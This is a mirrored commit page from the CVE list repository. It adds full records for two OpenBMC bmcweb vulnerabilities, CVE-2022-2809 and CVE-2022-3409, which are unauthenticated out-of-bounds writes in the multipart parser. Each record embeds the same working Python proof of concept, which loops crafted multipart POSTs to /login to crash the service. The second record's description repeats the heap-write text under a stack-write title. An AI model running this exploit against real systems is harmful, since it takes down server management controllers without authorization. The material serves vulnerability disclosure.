admin/cvelist
1
0
Fork 0
mirror of https://github.com/CVEProject/cvelist.git synced 2025-06-19 17:32:41 +00:00
Code Issues Packages Projects Releases Wiki Activity

Updates for two OpenBMC CVE Reports

Browse Source
This commit is contained in:
JamesMihm 2022-10-07 11:11:44 -07:00
parent 99887ef358
commit efed51b48f
2 changed files with 232 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

122
2022/2xxx/CVE-2022-2809.json
View File

@ -1,18 +1,128 @@
{ {
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": { "CVE_data_meta": {
"ASSIGNER": "James.Mihm@Intel.com",
"DATE_PUBLIC": "2022-10-07T19:00:00.000Z",
"ID": "CVE-2022-2809", "ID": "CVE-2022-2809",
"ASSIGNER": "cve@mitre.org", "STATE": "RESERVED",
"STATE": "RESERVED" "TITLE": "Unauthenticated out of bounds heap write in bmcweb"
}, },
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "OpenBMC",
"version": {
"version_data": [
{
"version_affected": ">=",
"version_name": "Release",
"version_value": "2.10"
},
{
"version_affected": "<=",
"version_name": "Release",
"version_value": "2.12"
},
{
"version_affected": "!>=",
"version_name": "Release",
"version_value": "2.13"
}
]
}
}
]
},
"vendor_name": "OpenBMC Project"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Finder: Jakub Rozanski, Intel Corporation"
},
{
"lang": "eng",
"value": "Remediation: Krzysztof Grobelny, Intel Corporation"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": { "description": {
"description_data": [ "description_data": [
{ {
"lang": "eng", "lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." "value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service.\n\nWhen fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS."
} }
] ]
},
"exploit": [
{
"lang": "eng",
"value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: <HOST-IP-ADDR-HERE>:8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode('utf-8'))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\"\n"
}
],
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-229: Improper Handling of Values"
}
]
},
{
"description": [
{
"lang": "eng",
"value": "CWE-122: Heap-based Buffer Overflow"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/openbmc/bmcweb",
"refsource": "CONFIRM",
"url": "https://github.com/openbmc/bmcweb"
}
]
},
"solution": [
{
"lang": "eng",
"value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796"
}
],
"source": {
"discovery": "INTERNAL"
} }
} }

122
2022/3xxx/CVE-2022-3409.json
View File

@ -1,18 +1,128 @@
{ {
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": { "CVE_data_meta": {
"ASSIGNER": "James.Mihm@Intel.com",
"DATE_PUBLIC": "2022-10-07T19:00:00.000Z",
"ID": "CVE-2022-3409", "ID": "CVE-2022-3409",
"ASSIGNER": "cve@mitre.org", "STATE": "RESERVED",
"STATE": "RESERVED" "TITLE": "Unauthenticated out of bounds stack write in bmcweb"
}, },
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "OpenBMC",
"version": {
"version_data": [
{
"version_affected": ">=",
"version_name": "Release",
"version_value": "2.10"
},
{
"version_affected": "<=",
"version_name": "Release",
"version_value": "2.12"
},
{
"version_affected": "!>=",
"version_name": "Release",
"version_value": "2.13"
}
]
}
}
]
},
"vendor_name": "OpenBMC Project"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Finder: Jakub Rozanski, Intel Corporation"
},
{
"lang": "eng",
"value": "Remediation: Krzysztof Grobelny, Intel Corporation"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": { "description": {
"description_data": [ "description_data": [
{ {
"lang": "eng", "lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." "value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service.\n\nThis vulnerability was identified during mitigation for CVE-2022-2809.\n \nWhen fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS. "
} }
] ]
},
"exploit": [
{
"lang": "eng",
"value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: <HOST-IP-ADDR-HERE>:8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode('utf-8'))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\"\n"
}
],
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-121: Stack-based Buffer Overflow"
}
]
},
{
"description": [
{
"lang": "eng",
"value": "CWE-229: Improper Handling of Values"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/openbmc/bmcweb",
"refsource": "CONFIRM",
"url": "https://github.com/openbmc/bmcweb"
}
]
},
"solution": [
{
"lang": "eng",
"value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868"
}
],
"source": {
"discovery": "INTERNAL"
} }
} }